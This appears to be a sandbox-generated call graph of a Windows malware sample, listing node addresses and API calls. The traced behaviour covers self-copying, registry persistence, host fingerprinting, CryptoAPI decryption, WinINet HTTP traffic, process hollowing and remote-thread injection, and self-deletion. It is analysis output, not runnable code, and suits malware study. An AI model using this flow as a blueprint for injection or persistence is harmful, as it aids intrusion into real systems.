12345->12346 12346->12340 12346->12344 12348 1176091 12347->12348 12348->12250 12349->12252 12351 117113a 12350->12351 12365 1171289 12350->12365 12352 1171144 lstrlenA 12351->12352 12351->12365 12353 1171156 lstrlenA 12352->12353 12352->12365 12354 1171168 12353->12354 12353->12365 12355 1171177 GetAllUsersProfileDirectoryA 12354->12355 12356 117118a GetEnvironmentVariableA 12354->12356 12357 11711a1 wnsprintfA lstrcmpiA 12355->12357 12356->12357 12358 1171216 12357->12358 12359 11711db 12357->12359 12614 11797a0 GetProcessHeap RtlAllocateHeap 12358->12614 12359->12358 12360 11711e3 CopyFileA SetFileAttributesA lstrcpyA 12359->12360 12360->12358 12362 1171220 lstrcpyA lstrcpyA CreateThread 12363 11712a3 12362->12363 12362->12365 12615 11712d0 12362->12615 12364 11797c0 2 API calls 12363->12364 12364->12365 12366 1175e30 12365->12366 12367 1175e64 RegOpenKeyExA 12366->12367 12368 1175e5d 12366->12368 12369 1173c39 12367->12369 12370 1175e8c RegQueryValueExA 12367->12370 12368->12367 12377 1176cf0 12369->12377 12371 1175edc 12370->12371 12372 1175ebc 12370->12372 12373 1175f15 RegCloseKey 12371->12373 12621 1179bd0 12371->12621 12372->12371 12375 1175ece RegDeleteValueA 12372->12375 12373->12369 12375->12371 12378 1176d13 RegOpenKeyExA 12377->12378 12379 1176d0c 12377->12379 12380 1173c4d 12378->12380 12381 1176d3a RegQueryValueExA 12378->12381 12379->12378 12384 1175f30 12380->12384 12382 1176d84 RegCloseKey 12381->12382 12383 1176d70 RegDeleteValueA 12381->12383 12382->12380 12383->12382 12625 1177d20 12384->12625 12387 1175f92 12388 1175f99 RegOpenKeyExA 12387->12388 12389 1175fc1 RegQueryValueExA 12388->12389 12390 1173c58 12388->12390 12391 1175ffc 12389->12391 12395 1179b90 12390->12395 12392 1176041 RegCloseKey 12391->12392 12393 1179bd0 QueryPerformanceCounter 12391->12393 12392->12390 12394 1176020 RegSetValueExA 12393->12394 12394->12392 12396 1179ba0 QueryPerformanceCounter 12395->12396 12397 1173c71 WSAStartup 12395->12397 12396->12397 12397->12239 12397->12263 12399 1175b67 12398->12399 12400 1173dac 12398->12400 12399->12400 12401 1175b7b lstrlenA lstrlenA 12399->12401 12412 1178a70 12400->12412 12404 1175ba3 12401->12404 12402 1175be0 VirtualAlloc 12402->12400 12406 1175c09 12402->12406 12403 1175bab StrStrIA 12403->12404 12405 1175bdc 12403->12405 12404->12402 12404->12403 12405->12402 12407 1175c1f StrStrIA 12406->12407 12408 1175c7f 12406->12408 12407->12408 12410 1175c39 lstrcpynA 12407->12410 12408->12400 12409 1175c91 VirtualAlloc 12408->12409 12409->12400 12411 1175cad 12409->12411 12410->12406 12411->12400 12413 1178ba3 12412->12413 12414 1178a87 12412->12414 12413->12267 12414->12413 12415 1178ab9 CryptAcquireContextA 12414->12415 12416 1178b12 12415->12416 12417 1178add GetLastError 12415->12417 12416->12413 12420 1178b1c CryptImportKey 12416->12420 12418 1178aef 12417->12418 12419 1178af8 CryptAcquireContextA 12417->12419 12418->12416 12418->12419 12419->12416 12421 1178b97 CryptReleaseContext 12420->12421 12422 1178b41 CryptImportKey 12420->12422 12421->12413 12423 1178b8d CryptDestroyKey 12422->12423 12424 1178b68 CryptDecrypt CryptDestroyKey 12422->12424 12423->12421 12424->12423 12426 1177987 VirtualAlloc 12425->12426 12427 1177ae9 12425->12427 12426->12427 12428 11779b6 12426->12428 12427->12272 12627 117a400 12428->12627 12431 1177ad8 VirtualFree 12431->12427 12432 1178a70 9 API calls 12433 1177a15 12432->12433 12433->12431 12434 1177a20 VirtualAlloc 12433->12434 12434->12431 12436 1177a5a 12434->12436 12435 1177ad0 12435->12431 12436->12435 12437 1177a89 inet_ntoa wnsprintfA 12436->12437 12437->12436 12439 1177965 12438->12439 12440 11778e4 12438->12440 12439->12272 12440->12439 12441 1177927 inet_ntoa wnsprintfA 12440->12441 12441->12440 12443 11742fa VirtualAlloc 12442->12443 12444 11744fd 12442->12444 12443->12444 12446 11744a3 12443->12446 12444->12275 12446->12444 12634 11792e0 12446->12634 12448 11742d7 12447->12448 12449 1174034 12447->12449 12448->12275 12449->12448 12450 117405f InitializeCriticalSection CreateEventA 12449->12450 12451 117409f 12450->12451 12452 11742cd DeleteCriticalSection 12451->12452 12453 11740ab EnterCriticalSection 12451->12453 12452->12448 12454 11740bb VirtualFree 12453->12454 12455 11740da 12453->12455 12454->12455 12456 11740f3 ResetEvent LeaveCriticalSection CreateThread 12455->12456 12457 11740e0 TerminateThread 12455->12457 12642 11797a0 GetProcessHeap RtlAllocateHeap 12456->12642 12696 1174ac0 12456->12696 12457->12456 12459 1174221 WaitForMultipleObjects WaitForSingleObject 12460 117424f WaitForSingleObject 12459->12460 12461 117424b 12459->12461 12463 1174267 TerminateThread 12460->12463 12464 1174273 EnterCriticalSection 12460->12464 12461->12460 12462 117413a 12462->12459 12467 11741d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 12462->12467 12463->12464 12465 1174283 VirtualFree 12464->12465 12466 11742a2 LeaveCriticalSection 12464->12466 12465->12466 12468 11797c0 2 API calls 12466->12468 12467->12462 12643 1174ba0 CoInitialize 12467->12643 12469 11742bb 12468->12469 12469->12452 12470->12279 12472 1174807 12471->12472 12473 1174665 12471->12473 12472->12473 12474 1174814 CryptAcquireContextA 12472->12474 12473->12294 12473->12295 12473->12297 12475 1174834 GetLastError 12474->12475 12477 1174856 12474->12477 12476 1174841 CryptAcquireContextA 12475->12476 12475->12477 12476->12477 12477->12473 12478 1174a9f CryptReleaseContext 12477->12478 12479 11748be CryptCreateHash 12477->12479 12478->12473 12480 1174a90 12479->12480 12481 11748f9 CryptHashData 12479->12481 12480->12478 12482 1174a83 CryptDestroyHash 12481->12482 12483 1174919 CryptDeriveKey 12481->12483 12482->12480 12483->12482 12484 117494a CryptDecrypt CryptDestroyKey 12483->12484 12484->12482 12485 1174995 CryptCreateHash 12484->12485 12485->12482 12486 11749b7 CryptHashData 12485->12486 12487 1174a76 CryptDestroyHash 12486->12487 12488 11749da CryptGetHashParam 12486->12488 12487->12482 12488->12487 12489 1174a11 CryptGetHashParam 12488->12489 12489->12487 12490 1174a3e 12489->12490 12490->12487 12492 117572e GetModuleFileNameA 12491->12492 12493 1178f9a 12491->12493 12531 1171ca0 CreateToolhelp32Snapshot 12492->12531 12493->12492 12494 1178fed GetVersionExA 12493->12494 12495 1179266 12494->12495 12496 1179005 GetSystemInfo 12494->12496 12495->12492 12497 117926c lstrcatA 12495->12497 12498 117901c 12496->12498 12499 1179115 12496->12499 12497->12492 12501 1179025 lstrcatA 12498->12501 12502 1179042 12498->12502 12500 1179110 12499->12500 12503 1179174 12499->12503 12504 117912b 12499->12504 12570 1179290 GetModuleHandleA GetProcAddress 12500->12570 12501->12500 12506 117904b lstrcatA 12502->12506 12507 1179068 12502->12507 12508 11791c3 12503->12508 12509 117917d 12503->12509 12510 1179134 lstrcatA 12504->12510 12511 117914e 12504->12511 12506->12500 12507->12500 12516 11790a1 GetSystemMetrics 12507->12516 12521 1179087 lstrcatA 12507->12521 12508->12500 12525 11791d5 lstrcatA 12508->12525 12526 11791ef 12508->12526 12517 1179186 lstrcatA 12509->12517 12518 11791a0 12509->12518 12510->12500 12511->12500 12513 1179157 lstrcatA 12511->12513 12513->12500 12514 1179219 lstrcatA 12515 1179228 lstrlenA 12514->12515 12519 1179259 lstrlenA 12515->12519 12520 1179239 lstrcatA lstrcatA 12515->12520 12522 11790c7 GetSystemMetrics 12516->12522 12523 11790ad lstrcatA 12516->12523 12517->12500 12518->12500 12524 11791a9 lstrcatA 12518->12524 12519->12495 12520->12519 12521->12500 12527 11790d3 lstrcatA 12522->12527 12528 11790ed 12522->12528 12523->12500 12524->12500 12525->12500 12526->12500 12529 11791f8 lstrcatA 12526->12529 12527->12500 12528->12500 12530 11790f8 lstrcatA 12528->12530 12529->12500 12530->12500 12532 1171e51 12531->12532 12533 1171cc9 Process32First 12531->12533 12549 1179d20 12532->12549 12534 1171e44 CloseHandle 12533->12534 12535 1171cee GetCurrentProcessId 12533->12535 12534->12532 12536 1171d04 12535->12536 12537 1171d12 12536->12537 12538 1171d20 Process32Next 12536->12538 12537->12534 12539 1171d44 Process32First 12537->12539 12538->12536 12538->12537 12539->12534 12540 1171d5f 12539->12540 12541 1171d71 lstrlenA 12540->12541 12542 1171e29 Process32Next 12540->12542 12543 1171e27 12541->12543 12544 1171d87 lstrcpyA OpenProcess 12541->12544 12542->12534 12542->12540 12543->12534 12544->12543 12545 1171dbb EnumProcessModules 12544->12545 12546 1171de5 GetModuleFileNameExA 12545->12546 12547 1171e02 GetProcessImageFileNameA 12545->12547 12548 1171e16 FindCloseChangeNotification 12546->12548 12547->12548 12548->12543 12550 1179d37 12549->12550 12551 1179f5d 12549->12551 12550->12551 12552 1179d4b GetSystemDirectoryA 12550->12552 12551->12306 12552->12551 12553 1179da8 GetVolumeInformationA 12552->12553 12553->12551 12554 1179deb 12553->12554 12573 1179f70 12554->12573 12558 1179f50 CoTaskMemFree 12558->12551 12559 1179f0c WideCharToMultiByte lstrcpynA 12559->12558 12561 1175ce7 lstrlenA 12560->12561 12562 117579d lstrcpyA 12560->12562 12561->12562 12563 1175cfa CreateFileA 12561->12563 12562->12309 12563->12562 12564 1175d23 GetFileSize 12563->12564 12565 1175d9f FindCloseChangeNotification 12564->12565 12566 1175d38 VirtualAlloc 12564->12566 12565->12562 12566->12565 12567 1175d54 ReadFile 12566->12567 12568 1175d8e VirtualFree 12567->12568 12569 1175d7b 12567->12569 12568->12565 12569->12568 12571 11792bd GetCurrentProcess 12570->12571 12572 1179215 12570->12572 12571->12572 12572->12514 12572->12515 12574 1179f87 12573->12574 12575 1179e2d StringFromCLSID 12573->12575 12574->12575 12581 11797a0 GetProcessHeap RtlAllocateHeap 12574->12581 12575->12558 12575->12559 12577 1179fb2 12577->12575 12578 1179fc8 GetAdaptersInfo 12577->12578 12580 1179ff4 12578->12580 12582 11797c0 12580->12582 12581->12577 12583 11797dc 12582->12583 12584 11797c9 GetProcessHeap RtlFreeHeap 12582->12584 12583->12575 12584->12583 12586 11759f3 12585->12586 12588 1175949 12585->12588 12586->12324 12587 11759de CharUpperA 12587->12588 12588->12586 12588->12587 12590 1178ce7 12589->12590 12591 1178bc7 12589->12591 12590->12336 12591->12590 12592 1178be5 CryptAcquireContextA 12591->12592 12593 1178c3e 12592->12593 12594 1178c09 GetLastError 12592->12594 12593->12590 12595 1178c48 CryptCreateHash 12593->12595 12596 1178c24 CryptAcquireContextA 12594->12596 12597 1178c1b 12594->12597 12598 1178c63 CryptHashData 12595->12598 12599 1178cdb CryptReleaseContext 12595->12599 12596->12593 12597->12593 12597->12596 12600 1178cd1 CryptDestroyHash 12598->12600 12601 1178c7b CryptGetHashParam 12598->12601 12599->12590 12600->12599 12601->12600 12602 1178ca3 12601->12602 12602->12600 12603 1178cab CryptGetHashParam 12602->12603 12603->12600 12604 1178ccb 12603->12604 12604->12600 12606 1179667 12605->12606 12607 1179722 12605->12607 12606->12607 12608 1179685 lstrlenA 12606->12608 12607->12336 12612 1179699 12608->12612 12609 11796fd lstrlenA 12610 1179715 lstrlenA 12609->12610 12611 117970c 12609->12611 12610->12607 12611->12610 12612->12609 12613 11796d4 lstrcatA lstrlenA 12612->12613 12613->12612 12614->12362 12616 11712fc 12615->12616 12617 11712e6 12615->12617 12617->12616 12618 117131d RegOpenKeyExA 12617->12618 12619 1171341 lstrlenA RegSetValueExA RegCloseKey 12618->12619 12620 1171378 Sleep 12618->12620 12619->12620 12620->12617 12622 1175ef6 RegSetValueExA 12621->12622 12623 1179bda 12621->12623 12622->12373 12623->12622 12624 1179b90 QueryPerformanceCounter 12623->12624 12624->12623 12626 1175f58 lstrcpyA lstrcatA 12625->12626 12626->12387 12626->12388 12628 11779d2 12627->12628 12629 117a417 12627->12629 12628->12431 12628->12432 12629->12628 12630 117a442 RegOpenKeyExA 12629->12630 12630->12628 12631 117a466 RegQueryValueExA 12630->12631 12632 117a490 RegCloseKey 12631->12632 12633 117a48a 12631->12633 12632->12628 12633->12632 12635 11792fa 12634->12635 12636 11793f8 12634->12636 12635->12636 12637 1179304 GetLocalTime 12635->12637 12636->12446 12639 1179322 12637->12639 12638 1178bb0 9 API calls 12638->12639 12639->12636 12639->12638 12640 1179650 5 API calls 12639->12640 12641 11793c9 lstrcatA 12640->12641 12641->12639 12642->12462 12644 1174bc2 12643->12644 12645 11756f0 CoUninitialize 12643->12645 12646 1174bd1 SetEvent 12644->12646 12647 1174bf9 12646->12647 12647->12645 12648 1174c10 WaitForSingleObject 12647->12648 12649 1174c28 VirtualAlloc VirtualAlloc VirtualAlloc 12647->12649 12648->12649 12650 1174c23 12648->12650 12649->12650 12651 1174c8a 12649->12651 12650->12645 12651->12650 12654 1174cc3 12651->12654 12655 11752a2 12651->12655 12659 1174db7 GetCurrentThreadId 12654->12659 12660 1174e2c 12654->12660 12669 1174ce5 12654->12669 12709 1178370 12655->12709 12656 1175354 lstrlenA lstrlenA 12657 11756b8 VirtualFree VirtualFree VirtualFree 12656->12657 12658 1175385 wsprintfA CryptBinaryToStringA 12656->12658 12657->12650 12658->12657 12661 11753d0 MultiByteToWideChar 12658->12661 12659->12669 12662 1174ee1 12660->12662 12663 1174e81 GetSystemMetrics GetSystemMetrics 12660->12663 12660->12669 12728 11717d0 12661->12728 12665 1174f40 12662->12665 12666 1174ef0 GlobalMemoryStatus 12662->12666 12663->12669 12665->12669 12672 1175032 12665->12672 12673 1174fdf lstrlenA 12665->12673 12666->12669 12668 117569b 12668->12657 12670 11756a4 VirtualFree 12668->12670 12670->12657 12671 117547d VirtualFree 12694 11754b1 12671->12694 12675 1175096 12672->12675 12676 1175041 lstrlenA 12672->12676 12673->12669 12674 117552c EnterCriticalSection 12679 1175542 VirtualAlloc 12674->12679 12680 117558c VirtualAlloc 12674->12680 12677 11750a5 lstrlenA 12675->12677 12678 1175104 12675->12678 12676->12669 12677->12669 12684 1175113 lstrlenA 12678->12684 12685 1175172 12678->12685 12688 1175578 12679->12688 12681 11755c7 GetTickCount 12680->12681 12682 117568e LeaveCriticalSection 12680->12682 12689 11755da 12681->12689 12682->12668 12683 11717d0 16 API calls 12683->12694 12684->12669 12686 1175181 lstrlenA 12685->12686 12687 11751e0 12685->12687 12686->12669 12691 117523f 12687->12691 12692 11751ef lstrlenA 12687->12692 12688->12682 12695 117565c VirtualFree 12689->12695 12690 117551b 12690->12668 12690->12674 12691->12669 12693 1179b90 QueryPerformanceCounter 12691->12693 12692->12669 12693->12669 12694->12683 12694->12690 12695->12682 12697 1174b96 12696->12697 12698 1174ad6 CoInitialize 12696->12698 12699 1174ade 12698->12699 12700 1174b80 Sleep 12699->12700 12701 1174aeb WaitForSingleObject 12699->12701 12700->12699 12701->12700 12702 1174b01 EnterCriticalSection 12701->12702 12786 1178250 12702->12786 12705 1174b50 12791 11762b0 12705->12791 12708 1174b90 CoUninitialize 12708->12697 12710 1178387 12709->12710 12711 1175344 12709->12711 12710->12711 12712 11783b1 VirtualAlloc VirtualAlloc 12710->12712 12711->12656 12711->12657 12713 1178592 12712->12713 12714 11783e9 12712->12714 12715 11785a9 12713->12715 12716 1178598 VirtualFree 12713->12716 12714->12713 12732 1178800 12714->12732 12715->12711 12718 11785af VirtualFree 12715->12718 12716->12715 12718->12711 12724 117847e 12754 1178970 12724->12754 12726 1178581 VirtualFree 12726->12713 12727 11784ad 12727->12726 12729 117181e 12728->12729 12730 11717e1 12728->12730 12729->12668 12729->12671 12729->12690 12730->12729 12765 1171840 12730->12765 12733 1178817 12732->12733 12734 1178420 12732->12734 12733->12734 12735 1178821 CryptAcquireContextA 12733->12735 12734->12713 12748 1178770 12734->12748 12736 1178845 GetLastError 12735->12736 12737 117887a 12735->12737 12738 1178857 12736->12738 12739 1178860 CryptAcquireContextA 12736->12739 12737->12734 12740 1178884 CryptGenKey 12737->12740 12738->12737 12738->12739 12739->12737 12741 1178950 CryptReleaseContext 12740->12741 12742 11788bd CryptExportKey 12740->12742 12741->12734 12743 1178946 CryptDestroyKey 12742->12743 12744 11788d9 12742->12744 12743->12741 12745 117893d 12744->12745 12746 11788f1 CryptImportKey 12744->12746 12745->12743 12746->12745 12747 1178916 CryptExportKey CryptDestroyKey 12746->12747 12747->12745 12749 11787d0 QueryPerformanceCounter 12748->12749 12750 117844b 12749->12750 12751 11787d0 12750->12751 12752 11787e3 QueryPerformanceCounter 12751->12752 12753 1178458 VirtualAlloc 12751->12753 12752->12753 12753->12713 12753->12724 12755 1178987 12754->12755 12756 1178a60 12754->12756 12755->12756 12757 11789a5 CryptAcquireContextA 12755->12757 12756->12727 12758 11789fe 12757->12758 12759 11789c9 GetLastError 12757->12759 12758->12756 12762 1178a04 CryptImportKey 12758->12762 12760 11789e4 CryptAcquireContextA 12759->12760 12761 11789db 12759->12761 12760->12758 12761->12758 12761->12760 12763 1178a54 CryptReleaseContext 12762->12763 12764 1178a29 CryptEncrypt CryptDestroyKey 12762->12764 12763->12756 12764->12763 12766 1171c95 12765->12766 12767 117185a 12765->12767 12766->12729 12767->12766 12768 11718ba InternetCrackUrlA 12767->12768 12768->12766 12769 1171910 InternetOpenA 12768->12769 12769->12766 12770 1171936 InternetConnectA 12769->12770 12771 117196f HttpOpenRequestA 12770->12771 12772 1171c88 InternetCloseHandle 12770->12772 12773 11719ad wnsprintfA HttpAddRequestHeadersA 12771->12773 12774 1171c7b InternetCloseHandle 12771->12774 12772->12766 12775 1171c6e InternetCloseHandle 12773->12775 12776 11719eb InternetSetOptionA 12773->12776 12774->12772 12775->12774 12785 1171a30 12776->12785 12778 1171a4d HttpSendRequestA 12779 1171a7b HttpQueryInfoA 12778->12779 12778->12785 12779->12785 12780 1171adc HttpQueryInfoA 12781 1171b47 VirtualAlloc 12780->12781 12780->12785 12782 1171c19 12781->12782 12781->12785 12783 1171c23 InternetReadFile 12782->12783 12783->12783 12783->12785 12784 1171b99 InternetReadFile 12784->12785 12785->12775 12785->12778 12785->12780 12785->12781 12785->12784 12787 1174b37 LeaveCriticalSection 12786->12787 12790 1178267 12786->12790 12787->12700 12787->12705 12788 11782e7 StrStrA 12788->12787 12788->12790 12790->12787 12790->12788 12875 1178090 12790->12875 12792 1174b5d VirtualFree SetEvent 12791->12792 12793 11762ca 12791->12793 12792->12708 12793->12792 12794 1176427 12793->12794 12796 1176399 12793->12796 12794->12792 12795 11764ba GetEnvironmentVariableA 12794->12795 12803 11765f3 12794->12803 12797 11764e1 12795->12797 12799 11763a4 VirtualAlloc 12796->12799 12800 1176410 12796->12800 12897 1179730 12797->12897 12798 1176bdd 12801 1176c13 12798->12801 12971 117a360 12798->12971 12804 117640e 12799->12804 12810 11763cc 12799->12810 12802 1171ee0 2 API calls 12800->12802 12802->12804 12803->12798 12936 1177250 12803->12936 12804->12794 12811 11763fd VirtualFree 12810->12811 12894 1171ee0 CreateThread 12810->12894 12811->12804 12812 1176552 WriteFile 12816 11765dd 12812->12816 12817 1176588 12812->12817 12813 1176654 VirtualAlloc 12814 1176752 12813->12814 12818 117667a 12813->12818 12821 11769ba GetEnvironmentVariableA 12814->12821 12824 117678e VirtualAlloc 12814->12824 12825 1176858 12814->12825 12816->12803 12820 11765e6 CloseHandle 12816->12820 12817->12816 12822 1176593 CloseHandle 12817->12822 12948 11797a0 GetProcessHeap RtlAllocateHeap 12818->12948 12820->12803 12823 11769e1 12821->12823 12901 1176c60 12822->12901 12831 1179730 QueryPerformanceCounter 12823->12831 12828 1176856 12824->12828 12829 11767c6 12824->12829 12827 1172070 32 API calls 12825->12827 12827->12828 12838 1176880 12828->12838 12847 1176894 12828->12847 12855 11769a6 12828->12855 12839 1176842 VirtualFree 12829->12839 12949 1172070 12829->12949 12834 11769f2 GetTickCount GetTempFileNameA CreateFileA 12831->12834 12837 1176a4f 12834->12837 12871 1176bbd 12834->12871 12835 1176698 CreateThread CloseHandle 12835->12814 12844 1176b1e WriteFile 12837->12844 12845 1176a7b VirtualAlloc 12837->12845 12952 11773c0 12838->12952 12839->12828 12840 11765c9 12913 11774a0 12840->12913 12841 11765d8 12843 1176cf0 4 API calls 12841->12843 12843->12816 12854 1176b1c 12844->12854 12853 1176aaf 12845->12853 12845->12854 12848 117698a 12847->12848 12959 11797a0 GetProcessHeap RtlAllocateHeap 12847->12959 12848->12855 12960 1172510 12848->12960 12867 1176ad2 WriteFile 12853->12867 12868 1176b08 VirtualFree 12853->12868 12860 1176bc9 CloseHandle 12854->12860 12861 1176b59 CloseHandle 12854->12861 12855->12821 12857 11768aa 12862 11768ca 12857->12862 12863 11768e9 VirtualAlloc 12857->12863 12858 1176809 VirtualAlloc 12864 117683f 12858->12864 12860->12871 12865 1171e60 2 API calls 12861->12865 12862->12848 12870 117693f CreateThread CloseHandle 12862->12870 12863->12862 12866 117690f 12863->12866 12864->12839 12869 1176b72 12865->12869 12866->12862 12867->12868 12868->12854 12869->12871 12872 1176b9e 12869->12872 12873 11773c0 5 API calls 12869->12873 12870->12848 12999 11777b0 12870->12999 12871->12798 12872->12871 12874 1172510 8 API calls 12872->12874 12873->12872 12874->12871 12876 11780a7 12875->12876 12877 1178246 12875->12877 12876->12877 12878 11780c5 VirtualAlloc 12876->12878 12877->12790 12878->12877 12879 11780eb 12878->12879 12887 1171390 12879->12887 12881 1178204 12881->12877 12882 1178235 VirtualFree 12881->12882 12882->12877 12883 1178100 12883->12881 12884 1178a70 9 API calls 12883->12884 12885 11781dd 12884->12885 12885->12881 12886 11781e4 VirtualAlloc 12885->12886 12886->12881 12888 117139c 12887->12888 12890 11713ae 12887->12890 12889 11713b6 GetProcessHeap RtlAllocateHeap 12888->12889 12888->12890 12889->12890 12892 11713e4 12889->12892 12890->12883 12891 11714e4 GetProcessHeap HeapFree 12891->12890 12892->12891 12893 1171498 GetProcessHeap HeapFree 12892->12893 12893->12890 12895 1171f21 12894->12895 12896 1171f0a WaitForSingleObject 12894->12896 12895->12811 12896->12895 12898 11764f2 GetTickCount GetTempFileNameA CreateFileA 12897->12898 12900 1179743 12897->12900 12898->12803 12898->12812 12899 1179763 QueryPerformanceCounter 12899->12900 12900->12898 12900->12899 12902 1176c83 RegOpenKeyExA 12901->12902 12903 1176c7c 12901->12903 12904 1176ca7 12902->12904 12905 11765ab 12902->12905 12903->12902 12906 1179b90 QueryPerformanceCounter 12904->12906 12908 1171e60 12905->12908 12907 1176cae RegSetValueExA RegCloseKey 12906->12907 12907->12905 12909 1171ece 12908->12909 12910 1171e73 12908->12910 12909->12840 12909->12841 12911 1171e90 CreateProcessA 12910->12911 12911->12909 12912 1171ebe CloseHandle 12911->12912 12912->12909 12914 11774bc 12913->12914 12915 11774d2 Sleep 12914->12915 12916 11774f5 GetModuleFileNameA 12915->12916 12917 117750b 12915->12917 12918 1177583 SetFileAttributesA wnsprintfA 12916->12918 12919 1177536 GetEnvironmentVariableA 12917->12919 12920 1177520 GetAllUsersProfileDirectoryA 12917->12920 12921 11775c6 TerminateThread 12918->12921 12922 11775d4 RegOpenKeyExA 12918->12922 12923 117754d lstrcatA lstrcatA lstrcatA 12919->12923 12920->12923 12921->12922 12925 117762a RegDeleteValueA RegCloseKey 12922->12925 12926 1177649 12922->12926 12923->12918 12925->12926 12927 117765e GetEnvironmentVariableA GetTickCount GetTempFileNameA lstrcatA CreateFileA 12926->12927 12928 1175e30 6 API calls 12926->12928 12929 11776df lstrlenA WriteFile CloseHandle 12927->12929 12930 11765ce ExitProcess 12927->12930 12931 117765b 12928->12931 12932 1177731 12929->12932 12931->12927 12933 1177744 CreateProcessA 12932->12933 12934 1177796 CloseHandle 12933->12934 12935 11777a3 ExitProcess 12933->12935 12934->12935 12937 1176638 12936->12937 12938 1177264 12936->12938 12937->12813 12937->12814 12938->12937 12939 11772ad wsprintfA 12938->12939 12940 11772df RegOpenKeyExA 12939->12940 12941 11772d8 12939->12941 12940->12937 12942 1177307 RegQueryValueExA 12940->12942 12941->12940 12943 11773a5 RegCloseKey 12942->12943 12944 1177333 12942->12944 12943->12937 12944->12943 12945 1177339 GetLocalTime 12944->12945 12976 1179910 SystemTimeToFileTime SystemTimeToFileTime 12945->12976 12947 1177388 12947->12943 12948->12835 12978 11720b0 12949->12978 12953 1176891 12952->12953 12954 11773d0 12952->12954 12953->12847 12954->12953 12955 1177419 wsprintfA 12954->12955 12956 1177444 12955->12956 12957 117744b RegOpenKeyExA 12955->12957 12956->12957 12957->12953 12958 117746f GetLocalTime RegSetValueExA RegCloseKey 12957->12958 12958->12953 12959->12857 12961 1172527 12960->12961 12962 1172573 12960->12962 12961->12962 12963 1172531 VirtualAlloc 12961->12963 12962->12855 12963->12962 12964 117257a VirtualAllocEx 12963->12964 12965 117259f VirtualAllocEx 12964->12965 12967 11725d7 12964->12967 12966 11725bf VirtualFree 12965->12966 12965->12967 12966->12962 12968 1172653 WriteProcessMemory 12967->12968 12969 1172687 VirtualFree CreateRemoteThread 12968->12969 12970 1172672 VirtualFree 12968->12970 12969->12962 12970->12962 12972 117a3ed 12971->12972 12973 117a370 12971->12973 12972->12801 12973->12972 12974 117a39b RegOpenKeyExA 12973->12974 12974->12972 12975 117a3bf RegSetValueExA RegCloseKey 12974->12975 12975->12972 12977 117996b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 12976->12977 12977->12947 12979 11720c3 GetEnvironmentVariableA lstrcatA 12978->12979 12980 1172080 12978->12980 12981 11720f2 lstrcatA lstrcatA 12979->12981 12982 1172115 12979->12982 12980->12839 12980->12858 12981->12982 12983 1172138 VirtualAlloc 12982->12983 12983->12980 12984 117219d CreateProcessA 12983->12984 12985 11721e2 VirtualAllocEx 12984->12985 12986 11721ca VirtualFree 12984->12986 12987 1172213 VirtualAllocEx 12985->12987 12989 117227d 12985->12989 12986->12980 12988 117223c TerminateProcess CloseHandle CloseHandle VirtualFree 12987->12988 12987->12989 12988->12980 12990 117237b WriteProcessMemory 12989->12990 12991 11723e1 VirtualFree GetThreadContext 12990->12991 12992 11723a0 TerminateProcess CloseHandle CloseHandle VirtualFree 12990->12992 12993 1172444 WriteProcessMemory 12991->12993 12994 1172414 TerminateProcess CloseHandle CloseHandle 12991->12994 12992->12980 12995 1172497 SetThreadContext 12993->12995 12996 117246a TerminateProcess CloseHandle CloseHandle 12993->12996 12994->12980 12997 11724c4 ResumeThread 12995->12997 12998 11724d9 TerminateProcess CloseHandle CloseHandle 12995->12998 12996->12980 12997->12980 12998->12980 13000 11778c3 12999->13000 13001 11777c0 CoInitialize 12999->13001 13002 11778bd CoUninitialize 13001->13002 13003 11777e8 13001->13003 13002->13000 13004 11777fc GetExitCodeProcess 13003->13004 13005 1177898 VirtualFree 13003->13005 13007 117788f 13004->13007 13008 1177818 13004->13008 13006 11797c0 2 API calls 13005->13006 13009 11778ba 13006->13009 13007->13005 13010 1177821 Sleep 13008->13010 13011 117782e CloseHandle Sleep 13008->13011 13009->13002 13010->13007 13012 1172070 32 API calls 13011->13012 13013 1177851 13012->13013 13013->13007 13014 1177863 13013->13014 13015 1172510 8 API calls 13013->13015 13014->13005 13016 117788c 13015->13016 13016->13007 15136 1174880 15137 117488f 15136->15137 15138 1174a9f CryptReleaseContext 15137->15138 15140 11748be CryptCreateHash 15137->15140 15139 1174aab 15138->15139 15141 1174a90 15140->15141 15142 11748f9 CryptHashData 15140->15142 15141->15138 15143 1174a83 CryptDestroyHash 15142->15143 15144 1174919 CryptDeriveKey 15142->15144 15143->15141 15144->15143 15145 117494a CryptDecrypt CryptDestroyKey 15144->15145 15145->15143 15146 1174995 CryptCreateHash 15145->15146 15146->15143 15147 11749b7 CryptHashData 15146->15147 15148 1174a76 CryptDestroyHash 15147->15148 15149 11749da CryptGetHashParam 15147->15149 15148->15143 15149->15148 15150 1174a11 CryptGetHashParam 15149->15150 15150->15148 15151 1174a3e 15150->15151 15151->15148 13017 c7b6de 13020 c7b5dc 13017->13020 13040 c79e50 GetLastError 13020->13040 13022 c7b5e9 13060 c7b6fb 13022->13060 13024 c7b5f1 13069 c7b370 13024->13069 13027 c7b608 13028 c7bf3c __onexit 21 API calls 13029 c7b619 13028->13029 13030 c7b64b 13029->13030 13076 c7b79d 13029->13076 13033 c7a8fb _free 20 API calls 13030->13033 13033->13027 13034 c7b646 13035 c79a46 _free 20 API calls 13034->13035 13035->13030 13036 c7b68f 13036->13030 13086 c7b246 13036->13086 13037 c7b663 13037->13036 13038 c7a8fb _free 20 API calls 13037->13038 13038->13036 13041 c79e66 13040->13041 13042 c79e6c 13040->13042 13043 c7aaf8 _abort 11 API calls 13041->13043 13044 c7a89e _abort 20 API calls 13042->13044 13046 c79ebb SetLastError 13042->13046 13043->13042 13045 c79e7e 13044->13045 13047 c79e86 13045->13047 13048 c7ab4e _abort 11 API calls 13045->13048 13046->13022 13049 c7a8fb _free 20 API calls 13047->13049 13050 c79e9b 13048->13050 13051 c79e8c 13049->13051 13050->13047 13052 c79ea2 13050->13052 13053 c79ec7 SetLastError 13051->13053 13054 c79cc2 _abort 20 API calls 13052->13054 13089 c7a85b 13053->13089 13055 c79ead 13054->13055 13057 c7a8fb _free 20 API calls 13055->13057 13059 c79eb4 13057->13059 13059->13046 13059->13053 13061 c7b707 CallCatchBlock 13060->13061 13062 c79e50 pre_c_initialization 38 API calls 13061->13062 13067 c7b711 13062->13067 13064 c7b795 CallCatchBlock 13064->13024 13066 c7a85b _abort 38 API calls 13066->13067 13067->13064 13067->13066 13068 c7a8fb _free 20 API calls 13067->13068 13239 c7b1a4 EnterCriticalSection 13067->13239 13240 c7b78c 13067->13240 13068->13067 13244 c76093 13069->13244 13072 c7b3a3 13074 c7b3ba 13072->13074 13075 c7b3a8 GetACP 